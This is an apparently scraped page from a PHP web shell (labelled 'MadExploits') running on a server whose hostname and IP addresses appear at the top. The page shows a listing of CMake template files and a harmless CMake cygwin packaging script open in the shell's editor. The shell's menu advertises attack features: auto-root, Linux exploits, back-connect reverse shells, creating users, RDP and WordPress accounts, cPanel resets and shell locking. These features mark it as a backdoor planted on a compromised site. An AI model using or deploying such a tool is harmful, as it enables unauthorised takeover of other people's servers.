Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
cmake /
Templates /
[ HOME SHELL ]
Name
Size
Permission
Action
AppleInfo.plist
1.17
KB
-rw-r--r--
CMakeVSMacros1.vsmacros
86
KB
-rw-r--r--
CMakeVSMacros2.vsmacros
62
KB
-rw-r--r--
CMakeVisualStudio6Configuratio...
181
B
-rw-r--r--
CPack.GenericDescription.txt
141
B
-rw-r--r--
CPack.GenericLicense.txt
104
B
-rw-r--r--
CPack.GenericWelcome.txt
96
B
-rw-r--r--
CPackConfig.cmake.in
559
B
-rw-r--r--
CTestScript.cmake.in
1.4
KB
-rw-r--r--
DLLFooter.dsptemplate
116
B
-rw-r--r--
DLLHeader.dsptemplate
7.31
KB
-rw-r--r--
EXEFooter.dsptemplate
116
B
-rw-r--r--
EXEHeader.dsptemplate
6.96
KB
-rw-r--r--
EXEWinHeader.dsptemplate
7.13
KB
-rw-r--r--
TestDriver.cxx.in
3.23
KB
-rw-r--r--
UtilityFooter.dsptemplate
29
B
-rw-r--r--
UtilityHeader.dsptemplate
2.82
KB
-rw-r--r--
cygwin-package.sh.in
2
KB
-rwxr-xr-x
staticLibFooter.dsptemplate
116
B
-rw-r--r--
staticLibHeader.dsptemplate
6.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cygwin-package.sh.in
#!/bin/sh # this is a sample shell script used for building a cmake # based project for a cygwin setup package. # get the current directory TOP_DIR=`cd \`echo "$0" | sed -n '/\//{s/\/[^\/]*$//;p;}'\`;pwd` # create build directory mkdirs() { ( mkdir -p "$TOP_DIR/@CPACK_PACKAGE_FILE_NAME@/.build" ) } # cd into # untar source tree and apply patch prep() { ( cd "$TOP_DIR" && tar xvfj @CPACK_PACKAGE_FILE_NAME@.tar.bz2 patch -p0 < "@CPACK_PACKAGE_FILE_NAME@-@CPACK_CYGWIN_PATCH_NUMBER@.patch" && mkdirs ) } # configure the build tree in .build directory # of the source tree conf() { ( cd "$TOP_DIR/@CPACK_PACKAGE_FILE_NAME@/.build" && cmake .. ) } # build the package in the .build directory build() { ( cd "$TOP_DIR/@CPACK_PACKAGE_FILE_NAME@/.build" && make && make test ) } # clean the build tree clean() { ( cd "$TOP_DIR/@CPACK_PACKAGE_FILE_NAME@/.build" && make clean ) } # create the package pkg() { ( cd "$TOP_DIR/@CPACK_PACKAGE_FILE_NAME@/.build" && cpack && mv @CPACK_PACKAGE_FILE_NAME@-@CPACK_CYGWIN_PATCH_NUMBER@.tar.bz2 "$TOP_DIR" ) } # create the source package spkg() { ( cd "$TOP_DIR/@CPACK_PACKAGE_FILE_NAME@/.build" && cpack --config CPackSourceConfig.cmake && mv @CPACK_PACKAGE_FILE_NAME@-@CPACK_CYGWIN_PATCH_NUMBER@-src.tar.bz2 "$TOP_DIR" ) } # clean up finish() { ( rm -rf "@CPACK_PACKAGE_FILE_NAME@" ) } case $1 in prep) prep ; STATUS=$? ;; mkdirs) mkdirs ; STATUS=$? ;; conf) conf ; STATUS=$? ;; build) build ; STATUS=$? ;; clean) clean ; STATUS=$? ;; package) pkg ; STATUS=$? ;; pkg) pkg ; STATUS=$? ;; src-package) spkg ; STATUS=$? ;; spkg) spkg ; STATUS=$? ;; finish) finish ; STATUS=$? ;; all) ( prep && conf && build && pkg && spkg && finish ; STATUS=$? ) ;; *) echo "Error: bad argument (all or one of these: prep mkdirs conf build clean package pkg src-package spkg finish)" ; exit 1 ;; esac exit ${STATUS}
Close